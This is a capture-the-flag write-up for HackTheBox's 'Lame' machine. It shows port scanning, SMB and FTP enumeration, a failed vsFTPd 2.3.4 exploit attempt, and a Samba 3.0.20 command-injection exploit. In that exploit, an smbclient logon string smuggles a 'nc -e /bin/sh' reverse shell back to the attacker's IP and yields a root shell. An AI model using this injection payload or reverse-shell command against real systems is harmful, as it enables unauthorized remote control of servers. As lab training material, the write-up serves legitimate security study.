Lame

#Linux #Enumeration #FTP #SMB

Lame is an easy-rated Linux machine from HackTheBox created by ch4p. This machine has no mystery, which is suitable for practice. In this case, you find something and search for that exploit. In the current post, my IP is 10.10.14.49, and the target’s IP is 10.129.223.149

Gather Information

Local Terminal
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts
From here, we have FTP, SMB and NetBios Session Service, nothing about a website.
Local Terminal
nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target

Port 21 Anonymous allowed and the version is included, vsFTPd 2.3.4, perfect, we will search about that. And the port 139 is another SMB but from a different workgroup.

Local Terminal
ftp 10.129.223.149			# user : anonymous , pass : anonymous
Hey, there is nothing inside!
Local Terminal
crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149
Look! There is an entrance at tmp, we should use that.
Local Terminal
smbclient -L 10.129.223.149 -N
Fail, but this is a client-side error.
Local Terminal
smbclient //10.129.223.129/tmp -N

And we can’t login with null?

Exploitation

At this point we have the following information, an Port 21 FTP vsFTPd 2.3.4, Port 139 SMB (unknown version) and Port 445 SMB (3.0.20)

  • Search: vsFTPd 2.3.4 exploit

Local Terminal
git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py
So, those are the instruction.
Local Terminal
python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami
It doesn’t works, let’s try with other way

At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320

Local Terminal
batcat 16320.rb
The exploit only connects to SMB and use a long string as username, and we know that the SMB has an unknown version.
As we can see, the payload is a terminal command, maybe we can change that part to create a reverse shell.
Local Terminal [A]
nc - nlvp 443
Local Terminal [B]
smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"
Now your TermA is target root [Root]

As you can see, we are connected as root, so we can get both flags directly.

Target Terminal [Root]
script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt

Last updated